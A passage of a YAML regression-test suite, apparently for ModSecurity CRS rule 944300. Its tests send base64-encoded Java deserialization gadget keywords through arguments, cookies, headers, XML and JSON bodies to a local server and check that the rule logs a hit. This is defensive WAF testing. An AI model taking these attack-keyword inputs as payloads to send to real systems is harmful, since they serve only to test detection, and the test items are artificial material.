"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-235 - desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-236 - desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-237 - desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-238 - desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-239 - desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-240 - desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-241 - desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-242 - desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-243 - desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-244 - desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-245 - desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-246 - desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-247 - desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-248 - desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-249 - desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-250 - desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-251 - desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-252 - desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-253 - desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-254 - desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-255 - desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-256 - desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-257 - desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-258 - desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-259 - desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-260 - desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-261 - desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-262 - desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-263 - desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-264 - desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-265 - desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-266 - desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-267 - desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-268 - desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-269 - desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-270 - desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-271 - desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-272 - desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-273 - desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-274 - desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-275 - desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 